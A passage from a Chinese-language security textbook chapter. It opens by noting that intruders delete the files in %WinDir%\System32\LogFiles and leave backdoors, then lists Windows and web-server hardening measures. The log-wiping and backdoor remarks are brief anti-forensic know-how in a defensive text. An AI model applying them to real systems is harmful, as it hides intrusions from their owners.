默認(rèn)的日志在:％WinDir％\System32\LogFiles下，刪除全部文件）；一些黑客會(huì)考慮修補(bǔ)服務(wù)器漏洞，如刪除弱口令、遍歷漏洞等，防止服務(wù)器被再次攻擊，但會(huì)給自己留下后門長(zhǎng)期占用。另外一些黑客會(huì)去告訴管理員漏洞之所在，或者直接在其機(jī)器上留下痕跡，如在首頁(yè)上署名（你們網(wǎng)站有漏洞，通常為腳本青年所為）。 3.8 黑客攻擊防范 Windows NT（New Technology)是微軟公司第一個(gè)真正意義上的網(wǎng)絡(luò)操作系統(tǒng)，發(fā)展經(jīng)過(guò)Windows NT3.0/NT4.0/NT5.0（Windows 2000）和 NT6.0（Windows 2003）等眾多版本，并逐步占據(jù)了廣大中小網(wǎng)絡(luò)操作系統(tǒng)的市場(chǎng)。下面主要介紹一些基本的Windows安全措施： 物理安全、停止Guest帳號(hào)、限制用戶數(shù)量。 創(chuàng)建多個(gè)管理員帳號(hào)、管理員帳號(hào)改名。 陷階帳號(hào)、更改默認(rèn)權(quán)限、設(shè)置安全密碼。 屏幕保護(hù)密碼、使用NTFS分區(qū)。 運(yùn)行防毒軟件和確保備份盤(pán)安全。 關(guān)閉不必要的端口、開(kāi)啟審核策略。 操作系統(tǒng)安全策略、關(guān)閉不必要的服務(wù)。 開(kāi)啟密碼策略、開(kāi)啟賬戶策略、備份敏感文件。 不顯示上次登錄名、禁止建立空連接和下載最新的補(bǔ)丁。 上述9條安全措施，可以對(duì)照關(guān)鍵字通過(guò)搜索引擎來(lái)了解如何配置。還可以考慮以下的一些高級(jí)安全措施： 關(guān)閉DirectDraw、關(guān)閉默認(rèn)共享。 禁用 Dump File、文件加密系統(tǒng)。 加密Temp文件夾、鎖住注冊(cè)表、關(guān)機(jī)時(shí)清除文件。 禁止軟盤(pán)光盤(pán)啟動(dòng)、使用智能卡、使用IPSec。 禁止判斷主機(jī)類型、抵抗DDOS。 禁止Guest訪問(wèn)日志和數(shù)據(jù)恢復(fù)軟件。 除此之外，還需考慮： 保證服務(wù)器所提供的服務(wù)安全，對(duì)服務(wù)器的TCP進(jìn)行端口過(guò)濾。 使用防護(hù)產(chǎn)品防病毒、防火墻、入侵檢測(cè)，并保證所有的策略庫(kù)及時(shí)更新，并盡量考慮使用網(wǎng)絡(luò)版防毒產(chǎn)品和專業(yè)服務(wù)器防毒產(chǎn)品。 對(duì)Web服務(wù)器做網(wǎng)絡(luò)負(fù)載平衡，對(duì)公網(wǎng)對(duì)內(nèi)網(wǎng)通信使用VPN，大的內(nèi)部網(wǎng)絡(luò)進(jìn)行Vlan劃分。 使用加密技術(shù)，如 PGP加密郵件，使用 PKI-公鑰相關(guān)軟件及服務(wù)，多因素認(rèn)證、動(dòng)態(tài)口令卡等。 使用Outlook或者Foxmail接收郵件，選擇純文本格式閱讀郵件。 使用Windows傳統(tǒng)風(fēng)格文件夾，顯示所有的文件和后綴名。 保證Web安全。 a.對(duì)網(wǎng)絡(luò)上下載的免費(fèi)代碼需要反復(fù)檢測(cè)。 b.對(duì)數(shù)據(jù)庫(kù)要進(jìn)行改名，設(shè)置強(qiáng)壯的管理員密碼和修改復(fù)雜的數(shù)據(jù)庫(kù)表名。 C.刪除管理系統(tǒng)的特征字符（如動(dòng)力文章的“Powered by：MyPower Ver3.51”），如有可能更改特征的文件名，如顯示文章的Article_Show.asp，可改成其他沒(méi)有特征的文件名如“xxssh.asp”（需要注意跟此頁(yè)面關(guān)聯(lián)的頁(yè)面連接也得更改成新的文件名）。 d.使用文件比對(duì)軟件如 Beyond Compare查看 Web目錄有程序文件與上傳備份文件對(duì)比，判斷有無(wú)被入侵者更改。文件比較 Windows漏洞的安全掃描工具 第3章結(jié)束！UDl紅軟基地